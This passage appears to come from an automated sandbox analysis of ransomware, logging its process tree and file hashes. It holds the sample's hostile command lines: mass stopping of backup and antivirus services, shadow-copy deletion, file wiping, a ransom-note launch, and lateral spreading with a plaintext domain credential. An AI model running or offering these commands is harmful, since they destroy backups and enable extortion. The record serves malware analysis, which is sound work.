      Command line: C:\Windows\system32\net1 stop BMR Boot Service /y
  - C:\Windows\SYSTEM32\net.exe (PID 4632)
    Command line: "net.exe" stop NetBackup BMR MTFTP Service /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 4492)
      Command line: C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
  - C:\Windows\SYSTEM32\net.exe (PID 4660)
    Command line: "net.exe" stop DefWatch /y
    - C:\Windows\system32\net1.exe (PID 4108)
      Command line: C:\Windows\system32\net1 stop DefWatch /y
  - C:\Windows\SYSTEM32\net.exe (PID 4740)
    Command line: "net.exe" stop ccEvtMgr /y
    - C:\Windows\system32\net1.exe (PID 5160)
      Command line: C:\Windows\system32\net1 stop ccEvtMgr /y
  - C:\Windows\SYSTEM32\net.exe (PID 4800)
    Command line: "net.exe" stop ccSetMgr /y
    - C:\Windows\system32\net1.exe (PID 5220)
      Command line: C:\Windows\system32\net1 stop ccSetMgr /y
  - C:\Windows\SYSTEM32\net.exe (PID 4836)
    Command line: "net.exe" stop SavRoam /y
    - C:\Windows\system32\net1.exe (PID 5324)
      Command line: C:\Windows\system32\net1 stop SavRoam /y
  - C:\Windows\SYSTEM32\net.exe (PID 4872)
    Command line: "net.exe" stop RTVscan /y
    - C:\Windows\system32\net1.exe (PID 5348)
      Command line: C:\Windows\system32\net1 stop RTVscan /y
  - C:\Windows\SYSTEM32\net.exe (PID 4948)
    Command line: "net.exe" stop QBFCService /y
    - C:\Windows\system32\net1.exe (PID 5460)
      Command line: C:\Windows\system32\net1 stop QBFCService /y
  - C:\Windows\SYSTEM32\net.exe (PID 5036)
    Command line: "net.exe" stop QBIDPService /y
    - C:\Windows\system32\net1.exe (PID 5516)
      Command line: C:\Windows\system32\net1 stop QBIDPService /y
  - C:\Windows\SYSTEM32\net.exe (PID 2372)
    Command line: "net.exe" stop Intuit.QuickBooks.FCS /y
    - C:\Windows\system32\net1.exe (PID 5684)
      Command line: C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
  - C:\Windows\SYSTEM32\net.exe (PID 4276)
    Command line: "net.exe" stop QBCFMonitorService /y
    - C:\Windows\system32\net1.exe (PID 5696)
      Command line: C:\Windows\system32\net1 stop QBCFMonitorService /y
  - C:\Windows\SYSTEM32\net.exe (PID 4656)
    Command line: "net.exe" stop YooBackup /y
    - C:\Windows\system32\net1.exe (PID 5760)
      Command line: C:\Windows\system32\net1 stop YooBackup /y
  - C:\Windows\SYSTEM32\net.exe (PID 4888)
    Command line: "net.exe" stop YooIT /y
    - C:\Windows\system32\net1.exe (PID 5748)
      Command line: C:\Windows\system32\net1 stop YooIT /y
  - C:\Windows\SYSTEM32\net.exe (PID 4748)
    Command line: "net.exe" stop zhudongfangyu /y
    - C:\Windows\system32\net1.exe (PID 5788)
      Command line: C:\Windows\system32\net1 stop zhudongfangyu /y
  - C:\Windows\SYSTEM32\net.exe (PID 5148)
    Command line: "net.exe" stop stc_raw_agent /y
    - C:\Windows\system32\net1.exe (PID 5824)
      Command line: C:\Windows\system32\net1 stop stc_raw_agent /y
  - C:\Windows\SYSTEM32\net.exe (PID 5208)
    Command line: "net.exe" stop VSNAPVSS /y
    - C:\Windows\system32\net1.exe (PID 5856)
      Command line: C:\Windows\system32\net1 stop VSNAPVSS /y
  - C:\Windows\SYSTEM32\net.exe (PID 5260)
    Command line: "net.exe" stop VeeamTransportSvc /y
    - C:\Windows\system32\net1.exe (PID 5904)
      Command line: C:\Windows\system32\net1 stop VeeamTransportSvc /y
  - C:\Windows\SYSTEM32\net.exe (PID 5336)
    Command line: "net.exe" stop VeeamDeploymentService /y
    - C:\Windows\system32\net1.exe (PID 5952)
      Command line: C:\Windows\system32\net1 stop VeeamDeploymentService /y
  - C:\Windows\SYSTEM32\net.exe (PID 5408)
    Command line: "net.exe" stop VeeamNFSSvc /y
    - C:\Windows\system32\net1.exe (PID 5964)
      Command line: C:\Windows\system32\net1 stop VeeamNFSSvc /y
  - C:\Windows\SYSTEM32\net.exe (PID 5484)
    Command line: "net.exe" stop veeam /y
    - C:\Windows\system32\net1.exe (PID 5992)
      Command line: C:\Windows\system32\net1 stop veeam /y
  - C:\Windows\SYSTEM32\net.exe (PID 5544)
    Command line: "net.exe" stop PDVFSService /y
    - C:\Windows\system32\net1.exe (PID 6008)
      Command line: C:\Windows\system32\net1 stop PDVFSService /y
  - C:\Windows\SYSTEM32\net.exe (PID 5864)
    Command line: "net.exe" stop BackupExecVSSProvider /y
    - C:\Windows\system32\net1.exe (PID 5384)
      Command line: C:\Windows\system32\net1 stop BackupExecVSSProvider /y
  - C:\Windows\SYSTEM32\net.exe (PID 2452)
    Command line: "net.exe" stop BackupExecAgentAccelerator /y
    - C:\Windows\system32\net1.exe (PID 5952)
      Command line: C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
  - C:\Windows\SYSTEM32\net.exe (PID 5732)
    Command line: "net.exe" stop BackupExecAgentBrowser /y
    - C:\Windows\system32\net1.exe (PID 5964)
      Command line: C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
  - C:\Windows\SYSTEM32\net.exe (PID 5676)
    Command line: "net.exe" stop BackupExecDiveciMediaService /y
    - C:\Windows\system32\net1.exe (PID 4744)
      Command line: C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
  - C:\Windows\SYSTEM32\net.exe (PID 5624)
    Command line: "net.exe" stop BackupExecJobEngine /y
    - C:\Windows\system32\net1.exe (PID 5884)
      Command line: C:\Windows\system32\net1 stop BackupExecJobEngine /y
  - C:\Windows\SYSTEM32\net.exe (PID 5348)
    Command line: "net.exe" stop BackupExecManagementService /y
    - C:\Windows\system32\net1.exe (PID 4812)
      Command line: C:\Windows\system32\net1 stop BackupExecManagementService /y
  - C:\Windows\SYSTEM32\net.exe (PID 5464)
    Command line: "net.exe" stop BackupExecRPCService /y
    - C:\Windows\system32\net1.exe (PID 4880)
      Command line: C:\Windows\system32\net1 stop BackupExecRPCService /y
  - C:\Windows\SYSTEM32\net.exe (PID 4148)
    Command line: "net.exe" stop AcrSch2Svc /y
    - C:\Windows\system32\net1.exe (PID 4800)
      Command line: C:\Windows\system32\net1 stop AcrSch2Svc /y
  - C:\Windows\SYSTEM32\net.exe (PID 5148)
    Command line: "net.exe" stop AcronisAgent /y
    - C:\Windows\system32\net1.exe (PID 5604)
      Command line: C:\Windows\system32\net1 stop AcronisAgent /y
  - C:\Windows\SYSTEM32\net.exe (PID 5968)
    Command line: "net.exe" stop CASAD2DWebSvc /y
    - C:\Windows\system32\net1.exe (PID 5716)
      Command line: C:\Windows\system32\net1 stop CASAD2DWebSvc /y
  - C:\Windows\SYSTEM32\net.exe (PID 5164)
    Command line: "net.exe" stop CAARCUpdateSvc /y
    - C:\Windows\system32\net1.exe (PID 5408)
      Command line: C:\Windows\system32\net1 stop CAARCUpdateSvc /y
  - C:\Windows\SYSTEM32\net.exe (PID 4468)
    Command line: "net.exe" stop sophos /y
    - C:\Windows\system32\net1.exe (PID 4928)
      Command line: C:\Windows\system32\net1 stop sophos /y
  - C:\Windows\SYSTEM32\sc.exe (PID 5644)
    Command line: "sc.exe" config SQLTELEMETRY start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 5900)
    Command line: "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 5252)
    Command line: "sc.exe" config SQLWriter start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 4608)
    Command line: "sc.exe" config SstpSvc start= disabled
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4872)
    Command line: "taskkill.exe" /IM mspub.exe /F
    Signatures: Kills process with taskkill
  - C:\Windows\SYSTEM32\taskkill.exe (PID 5036)
    Command line: "taskkill.exe" /IM mydesktopqos.exe /F
    Signatures: Kills process with taskkill
  - C:\Windows\SYSTEM32\taskkill.exe (PID 5296)
    Command line: "taskkill.exe" /IM mydesktopservice.exe /F
    Signatures: Kills process with taskkill
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 4276)
    Command line: "vssadmin.exe" Delete Shadows /all /quiet
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 5196)
    Command line: "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 5140)
    Command line: "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 4828)
    Command line: "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 6028)
    Command line: "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 4020)
    Command line: "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 4416)
    Command line: "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 3016)
    Command line: "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 780)
    Command line: "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 4904)
    Command line: "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 5608)
    Command line: "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 2108)
    Command line: "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 5824)
    Command line: "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    Signatures: Enumerates connected drives; Interacts with shadow copies
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 4356)
    Command line: "vssadmin.exe" Delete Shadows /all /quiet
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\cmd.exe (PID 196)
    Command line: "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  - C:\Windows\SYSTEM32\net.exe (PID 5852)
    Command line: "net.exe" use \\10.10.0.53 /USER:SHJPOLICE\amer !Omar2012
  - C:\Users\Admin\AppData\Local\Temp\c3eokz5t.exe (PID 4404)
    Command line: "C:\Users\Admin\AppData\Local\Temp\c3eokz5t.exe" \10.10.0.53 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
    Signatures: Executes dropped EXE
  - C:\Windows\SYSTEM32\arp.exe (PID 4692)
    Command line: "arp" -a
  - C:\Windows\System32\mshta.exe (PID 4436)
    Command line: "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
    Signatures: Blocklisted process makes network request
  - C:\Windows\SYSTEM32\cmd.exe (PID 1260)
    Command line: "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    - C:\Windows\system32\PING.EXE (PID 5060)
      Command line: ping 127.0.0.7 -n 3
      Signatures: Runs ping.exe
    - C:\Windows\system32\fsutil.exe (PID 6100)
      Command line: fsutil file setZeroData offset=0 length=524288 “%s”
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe2⤵PID:1540
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:408
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:4428
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5 78b0f852e77263420ec0b337836cbfa1
SHA1 72fc942fe2ace153a516e9d5605a81015e63e45d
SHA256 ea07953a673620666e39dcd258c2e11978e663d7c575eb392957e887027bd0c1
SHA512 2f5653bd2a2794cd8a2ee97d6964464db2c7b9fd2f3ec3d7fea36685c33a62d185762e1b84298f622e3ebcde53608581205f30a8ad8a5b304b1d3b7d7ef59b31
-
MD5 2a694ac72df5fb8dafec4837fda13db7
SHA1 c29e7536d91425adc54f42d23b45e6b0766c2ede
SHA256 40cab2e3216c87692d92013de4887364edc2ea4cf92b44ba82bab6d9f02a3756
SHA512 885528f7f3711c998acd13bb6373c21ab399c7fa99f6f63b4070ca1313cf1088db0aea759344648a322ee6d23b912ec6fc8873447bd4e201690480f82d291ec2
-
MD5 2a694ac72df5fb8dafec4837fda13db7
SHA1 c29e7536d91425adc54f42d23b45e6b0766c2ede
SHA256 40cab2e3216c87692d92013de4887364edc2ea4cf92b44ba82bab6d9f02a3756
SHA512 885528f7f3711c998acd13bb6373c21ab399c7fa99f6f63b4070ca1313cf1088db0aea759344648a322ee6d23b912ec6fc8873447bd4e201690480f82d291ec2
-
MD5 ec7b0b3d892c4f7d0382a031c094653f
SHA1 a6ffd1ac5d895be20c21eb8f7becf2bd4bf99781
SHA256 ff816e258056691ffa9a9aca2e9a6c0569c8bf5cad8860981624f0648d7ce6ea
SHA512 f5eb1d6b405e583634b85dd16a6d52641317ed801b99dcd7bb3f4caf2a790fbd41cfc9eda801d056100c6d23887af0057a9f47a1444ac8bf2b571d7ebf79086b
-
MD5 f0c0e33cb8c314d9273b0671c8ef2a1e
SHA1 e60be3364e7f3313d92deadfc4f77cfb8fc07094
SHA256 d341a00e058975140d07946f2aa41c55a2f1ca0c7002ec8c8552e8991ac3eb3d
SHA512 4176127fe50225587c2a4472facff18282ab8c7953a4089a4c25a11d367f66d274347fa1084311c2226e71378c3ac2a9039ced1a4471832792445ed29ccf32a8
-
MD5 f0c0e33cb8c314d9273b0671c8ef2a1e
SHA1 e60be3364e7f3313d92deadfc4f77cfb8fc07094
SHA256 d341a00e058975140d07946f2aa41c55a2f1ca0c7002ec8c8552e8991ac3eb3d
SHA512 4176127fe50225587c2a4472facff18282ab8c7953a4089a4c25a11d367f66d274347fa1084311c2226e71378c3ac2a9039ced1a4471832792445ed29ccf32a8
-
MD5 f0c0e33cb8c314d9273b0671c8ef2a1e
SHA1 e60be3364e7f3313d92deadfc4f77cfb8fc07094
SHA256 d341a00e058975140d07946f2aa41c55a2f1ca0c7002ec8c8552e8991ac3eb3d
SHA512 4176127fe50225587c2a4472facff18282ab8c7953a4089a4c25a11d367f66d274347fa1084311c2226e71378c3ac2a9039ced1a4471832792445ed29ccf32a8
-
MD5 14d33a7bdcf61d5d6d29e744daa969e7
SHA1 50de301bb0db9abc8cf830c8af9d54d13884dbc7
SHA256 db6876ed6288f86294c98f2a6802e5229b49ed043f7764071533472e30c403f9
SHA512 7f03211671e4823e222e696c9f3ca6301ebcdf35add5c93310178e9e35b306adf50f93208332b1f91bcb1f0eb8a4186597682db22090c7fbeb12491d15b46120
-
MD5 d844a33ea222cd63d3df2bd74ddf742b
SHA1 5d8b7e0a96c86430507ac41d821248d95edf4a52
SHA256 297929e0b761983531a2cfaea05b0c08a7b384d14ef653d984203db920c49295
SHA512 262c94ce0bb2449f9f254800aa27958ea2d25b6b4c2aab946460d6fdb647e207f3009a3773e1d6ee98c00b0fbf29893fd965d0e685f9f7a3429a39db4c3b635b
-
MD5 d844a33ea222cd63d3df2bd74ddf742b
SHA1 5d8b7e0a96c86430507ac41d821248d95edf4a52
SHA256 297929e0b761983531a2cfaea05b0c08a7b384d14ef653d984203db920c49295
SHA512 262c94ce0bb2449f9f254800aa27958ea2d25b6b4c2aab946460d6fdb647e207f3009a3773e1d6ee98c00b0fbf29893fd965d0e685f9f7a3429a39db4c3b635b
-
MD5 9b5a481f11ce24973ed9532b1bbcc394
SHA1 973732339705552f1af4dc6d8f09feed902f3b65
SHA256 3ca19e516fda9f9c04097921d27a5856fae0538ca1ebf11efc4c7b2c44208113
SHA512 683395ba58ed0d28a2a2f6ab8f24783d9be0d78c3106bd4e6e512e355aa2efaac28ce8c7adbdffa726199e3c6b4aa47e453552bd8a8139bb3a6c58eb2491e045
-
MD5 ec42421720f415adecf3c598c4287a10
SHA1 9c0ce8ee98768b6272642997bc862b772d0cd18b
SHA256 be7d6217b57989fa13fa3c523b695e9d52066171c49a0ace27106aecddf50e99
SHA512 49b4dfe123cf767f207cbbe6c9d27797424b64840a650a2841420ca899b9fb39ea31fec7bfa96b0588e3b4b76ae2383773fada18f9d12410785d867a7d6ccbc4
-
MD5 a8283f82f258a5577fe39fe24650a880
SHA1 1fb0e4efaf0ee0dabc525ff37059a76486311642
SHA256 1398d653106a68e31dbb1da06141a1809a65e92a45f021edf6be220265957225
SHA512 6ce8f9f0c9cf8b611528947d8d81f5c870d6f5ecc2a7dab33af782aa092c530ff97736f5122b3b2e802fd5f19880f05597e83965bca3e64bbaad0f96e9da80ff
-
MD5 a8283f82f258a5577fe39fe24650a880
SHA1 1fb0e4efaf0ee0dabc525ff37059a76486311642
SHA256 1398d653106a68e31dbb1da06141a1809a65e92a45f021edf6be220265957225
SHA512 6ce8f9f0c9cf8b611528947d8d81f5c870d6f5ecc2a7dab33af782aa092c530ff97736f5122b3b2e802fd5f19880f05597e83965bca3e64bbaad0f96e9da80ff
-
MD5 85a366844a7a429001660821c6808956
SHA1 1f3764bc3ea18130a0abea6c18a8d6fc120a4908
SHA256 11514502268414441de6f91983452014c683aca6b4c3a24b29777a81b59f854a
SHA512 56644b06bc6abdc95b5b560004893ffd6807025198f6e1e7b0cd3fa02374189a0e85a4e4836b422cd674613c346d37b00fbfbcaf252a2bd82fcaac04151dd656